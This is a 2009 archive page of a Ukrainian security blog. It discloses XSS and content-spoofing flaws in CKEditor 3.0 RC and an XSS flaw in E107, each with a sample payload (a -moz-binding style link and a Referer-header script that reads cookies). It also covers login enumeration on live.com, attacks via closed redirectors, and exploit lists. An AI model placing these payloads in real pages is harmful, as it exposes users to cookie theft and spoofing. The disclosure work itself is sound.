Архів за Вересень, 2009

XSS та Content Spoofing уразливості в CKEditor

19:27 26.09.2009

08.07.2009

Сьогодні я знайшов Cross-Site Scripting та Content Spoofing уразливості в CKEditor. Про що найближчим часом повідомлю розробникам редактора (які є також розробниками FCKeditor).

Дані уразливості аналогічні уразливостям в FCKeditor, про які я писав раніше.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

26.09.2009

XSS:

В CKEditor 3.0 RC є Persistent XSS уразливість, що дозволяє розміщувати XSS код на сайтах, які його використовуть. Атака (в Mozilla і Firefox) відбувається через розміщення лінки з вказанням стилю:

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>

Content Spoofing:

Це Persistent Content Spoofing уразливість.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

Дані уразливості в самому редакторі, тому їх можна використати на будь-якому сайті, що використовує CKEditor в якості редактора для веб форм.

Уразливі CKEditor 3.0 RC та попередні версії.

Добірка експлоітів

16:10 26.09.2009

В даній добірці експлоіти в веб додатках:

  • MLdonkey <= 2.9.7 HTTP DOUBLE SLASH Arbitrary File Disclosure Vuln (деталі)
  • Optus/Huawei E960 HSDPA Router SMS XSS Attack (деталі)
  • Pyrophobia 2.1.3.1 LFI Command Execution Exploit (деталі)
  • Free Arcade Script 1.0 LFI Command Execution Exploit (деталі)
  • pPIM 1.01 (notes.php id) Remote Command Execution Exploit (деталі)
  • zFeeder 1.6 (admin.php) No Authentication Vulnerability (деталі)
  • XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Qwerty CMS (id) Remote SQL Injection Vulnerability (деталі)
  • PenPal 2.0 (Auth Bypass) Remote SQL Injection Vulnerability (деталі)
  • Netgear WGR614v9 Wireless Router Get Request Denial of Service Vuln (деталі)
  • pPIM 1.0 Multiple Remote Vulnerabilities (деталі)
  • SkyPortal WebLinks 0.12 Contents Change Vulnerability (деталі)
  • SkyPortal Picture Manager 0.11 Contents Change Vulnerability (деталі)
  • SkyPortal Classifieds System 0.12 Contents Change Vulnerability (деталі)
  • eZ Publish OS Commanding executing exploit by s4avrd0w (деталі)

Уразливості на live.com

23:55 25.09.2009

У січні, 31.01.2009, я знайшов Abuse of Functionality та Insufficient Anti-automation уразливості на сайті https://signup.live.com компанії Microsoft.

Abuse of Functionality:

На сторінці реєстрації https://signup.live.com/signup.aspx функція Check Availability, яка призначена для перевірки чи вільний даний логін, дозволяє дізнатися логіни користувачів в системі.

Insufficient Anti-automation:

Враховучи, що дана функція немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів (які використовуються для доступу до пошти Hotmail та інших проектів Microsoft). Що може бути зроблено за допомогою брутфорсерів логінів, зокрема, моєї програми Brute force login identifier.

В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів сайта.

Численні уразливості в PostgreSQL

22:42 25.09.2009

Виявлені численні уразливості безпеки в PostgreSQL.

Уразливі версії: PostgreSQL 8.2, PostgreSQL 8.3, PostgreSQL 8.4.

Відмова в обслуговуванні, підвищення привілеїв, обхід аутентифікації при використанні LDAP.

Добірка уразливостей

16:28 25.09.2009

В даній добірці уразливості в веб додатках:

  • Debian generated SSH-Keys working exploit (деталі)
  • OpenSSL vulnerability (деталі)
  • OpenSSH vulnerability (деталі)
  • SQL Injection vulnerability in Joomla Component GameQ (деталі)
  • Pro Clan Manager 0.4.2 - Session Fixation (деталі)
  • MULTI SECURITY VULNERABILITIES IN MVNFORUM (деталі)
  • Exploit of vulnerability EZSA-2008-003 with accounting record activation (деталі)
  • Stored XSS Vulnerability in Xoops 2.3.x (деталі)
  • Multiple Local File Include Vulnerabilities in Xoops 2.3.x (деталі)
  • Multiple Local File Include Vulnerabilities in Xoops 2.3.x (деталі)

Attacks via closed redirectors

22:36 24.09.2009

This is English version of my Attacks via closed redirectors article.

In my article Redirectors: the phantom menace I wrote about attacks with using of open redirectors. Besides using of open redirectors for various attacks, closed redirectors also can be used.

Open redirectors - are redirectors which set address for redirection in URL (http://site/redirector.php?url=http://site2). Closed redirectors don’t set address for redirection in URL and have necessary addresses in DB, from which they take them by id (http://site/closed_redirector.php?id=1).

Closed redirectors considered more secure in comparison with open ones, but, as it’s clear from my article, they also can be used for many attacks (when there is possibility to set in them necessary URLs, or if they already were set). To closed redirectors belong as redirection services (such as TinyURL and others), as different counters, ratings and banner systems, where necessary URL is set in DB and is accessible by id. I.e. if you have access, for example, to banner system at the site, and can set arbitrary value of URL for banner (to which user will go at click on it), then you can conduct various attacks.

I meet many times in Internet cases of using of closed redirectors for different attacks. And also used them by myself during finding of vulnerabilities at the sites (for bypassing of filters and WAF). And I wrote about some of these attacks at my site.

Attacks via closed redirectors.

There are possible next attacks via closed redirectors:

  • Redirection.
  • Bypass of spam-filters.
  • Bypass of flash restrictions.
  • XSS attack via jar: URI in Firefox.
  • CSRF attacks on a site.
  • Hidden attacks on other sites.
  • Image leakage in Firefox.
  • Denial of Service attacks.
  • Cross-Site Scripting attacks.
  • Bypass of protection filters.

If there were 12 attacks via open redirectors, then there are possible 10 attacks via closed redirectors (one new attack from them). You can read in detail about these attacks in my article.

In case of such attacks as Redirection, Bypass of spam-filters, Bypass of flash restrictions, XSS attack via jar: URI in Firefox, CSRF attacks on a site, Hidden attacks on other sites, Image leakage in Firefox, the attack itself occurs almost equally for open and closed redirectors. In case of Denial of Service attacks it’s necessarily needed to use of closed redirector, i.e. there are possible two variants of an attack: using of open and closed redirector, using of two closed redirectors.

In case of Cross-Site Scripting attacks there are such attacks, which are possible with closed redirectors, particularly at redirection services such as TinyURL. These are attacks #3 and #5, which are described in my article Cross-Site Scripting attacks via redirectors. And I’ll tell more in detail about tenth attack.

Bypass of protection filters.

Redirection services (which are closed redirectors) allow to create new addresses for already existent addresses of the sites. Which allows to use them for bypass of the filters (including WAF) at the sites. It can be used in case of need to place a link or at conducting of XSS attacks. You can read in detail about this attack in my article Using of redirection services for bypass of the filters.

Invision Power Board 3.0.3

19:21 24.09.2009

У вересні, 14.09.2009, вийшла Invision Power Board 3.0.3. В даній версії виправлені помилки та покращена функціональність.

Компанія IBResource повідомляє про вихід російської версії IP.Board 3.0.3. Дане оновлення третьої версії IPB пов’язане з виправленням помилок і поліпшенням роботи існуючих можливостей форуму. Форум став ще більш стабільний, також обновлені модулі галереї, блогів і файлового архіву.

Добірка експлоітів

17:15 24.09.2009

В даній добірці експлоіти в веб додатках:

  • pHNews Alpha 1 (header.php mod) SQL Injection Vulnerability (деталі)
  • S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns (деталі)
  • smNews 1.0 Auth Bypass/Column Truncation Vulnerabilities (деталі)
  • Firepack (admin/ref.php) Remote Code Execution Exploit (деталі)
  • Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta) (деталі)
  • Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability (деталі)
  • i-dreams GB Server (admin.dat) File Disclosure Vulnerability (деталі)
  • i-dreams GB 5.4 Final (admin.dat) File Disclosure Vulnerability (деталі)
  • i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability (деталі)
  • Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit (деталі)
  • phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability (деталі)
  • Graugon Forum v1 (id) SQL Command Injection Exploit (деталі)
  • MDPro Module My_eGallery (pid) Remote SQL Injection Exploit (деталі)
  • taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability (деталі)
  • Plaintext Recovery Attack Against SSH (деталі)

XSS уразливість в E107

23:57 23.09.2009

У січні, 31.01.2009, я знайшов Cross-Site Scripting уразливість в системі E107. Коли виявив уразливість на www.nist.org. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в E107.

XSS:

На сторінці відправки новини на емайл (http://site/email.php?news.1) можна провести XSS атаку через заголовок Referer. Зокрема, це можна зробити через флеш.

Referer: '><script>alert(document.cookie)</script>

Уразливі E107 0.7.16 та попередні версії (усі версії).

Похакані сайти №63

22:47 23.09.2009

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://aeclub.net (хакером Georgian1115) - 11.09.2009, зараз сайт вже виправлений адмінами
  • http://guides.org.ua (хакером AYDIN)
  • http://inet-mag.com.ua (хакером moroccan-alien) - 18.09.2009, зараз сайт вже виправлений адмінами
  • http://pascha.ukrchrist.org (хакерами Nicky Mc, DarKHacker і Netw0rk-k1LL3r)
  • http://softprosto.com.ua (хакером Cyb3rking)